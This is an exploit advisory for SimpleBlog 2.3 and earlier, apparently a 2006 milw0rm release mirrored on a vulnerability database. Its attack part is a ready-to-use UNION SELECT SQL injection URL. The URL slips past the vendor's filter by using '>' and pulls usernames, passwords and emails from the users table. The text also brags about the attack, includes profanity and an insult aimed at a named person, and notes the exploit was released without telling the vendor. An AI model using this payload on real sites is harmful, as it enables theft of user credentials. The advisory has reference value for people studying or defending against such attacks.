Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14145
HistorySep 04, 2006 - 12:00 a.m.

SimpleBlog <= 2.3 (id) Remote SQL Injection Vulnerability

2006-09-0400:00:00
vulners.com
29
                                       _           _        
                                __   _(_)_ __  ___| |_ __ _ 
                                \ \ / / | '_ \/ __| __/ _` |
                                 \ V /| | |_) \__ \ || (_| |
                                  \_/ |_| .__/|___/\__\__,_|
                                      |_| AnD
	                               _               _    _ _ _     
                   _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) | |____
                  | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_  /
                  | | | | | | |_| | | | (_| |  __/ |  \__ \   <| | | |/ / 
                  |_| |_| |_|\__,_|_|  \__,_|\___|_|  |___/_|\_\_|_|_/___|

	+-----------------------------------------------------------------+
	| Vipsta & MurderSkillz fucking pwnt this webApp                  |
	+-----------------------------------------------------------------+
	| App Name: SimpleBlog 2.3 					  |
	| App Author: 8pixel.net					  |
	| App Version: <= 2.3 						  |
	| App Type: Blog/Journal					  |
	+-----------------------------------------------------------------+
	| DETAILS							  |
	+-----------------------------------------------------------------+
	| Vulnerability: Remote SQL Injection				  |
	| Requirements: Database with UNION support			  |
	| Revisions: Note - This is a revision of another vuln 	          |
	|	            posted by Chironex Fleckeri			  |
	+-----------------------------------------------------------------+
	| CODE								  |
	+-----------------------------------------------------------------+
	| Vendor "implemented" a fix for SQL injection vulnerabilities.   |
	| however this bullshit was easily worked around by		  |
	| Vipsta & MurderSkillz.					  |
	|								  |
	| Vendor attempted to remove illegal characters like ' and =      |
	| which stop most SQL injection vulnerabilities. However:	  |
	| Vendor failed to remove '>' symbol.				  |
	+-----------------------------------------------------------------+
	| EXPLOIT							  |
	+-----------------------------------------------------------------+
	| SQL Injection String:						  |

±----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1 |
±----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| TIMELINE |
±----------------------------------------------------------------+
| 9/2/06 - Vendor Notified. |
| 9/2/06 - Vendor Replied. Threatens legal action. |
| 9/4/06 - Exploit Released with no details to vendor. |
±----------------------------------------------------------------+
| SHOUTZ |
±----------------------------------------------------------------+
| Everyone at g00ns.net - including: |
| z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo, |
| TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot, |
| JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be, |
| ReysRaged, milf <3, gio, RedCoat, and all who I forgot! |
±----------------------------------------------------------------+
| ADDITIONAL NOTES |
±----------------------------------------------------------------+
| TeamSpeak: ts.g00ns.net |
| IRC: irc.g00ns.net |
±----------------------------------------------------------------+
| PERSONAL STUFF |
±----------------------------------------------------------------+
| Sess from g00ns.net IS A FUCKING MORON. |
±----------------------------------------------------------------+

                                         __ 
                              ___  ___  / _|
                             / _ &#92;/ _ &#92;| |_ 
                            |  __/ &#40;_&#41; |  _|
                             &#92;___|&#92;___/|_|.

milw0rm.com [2006-09-04]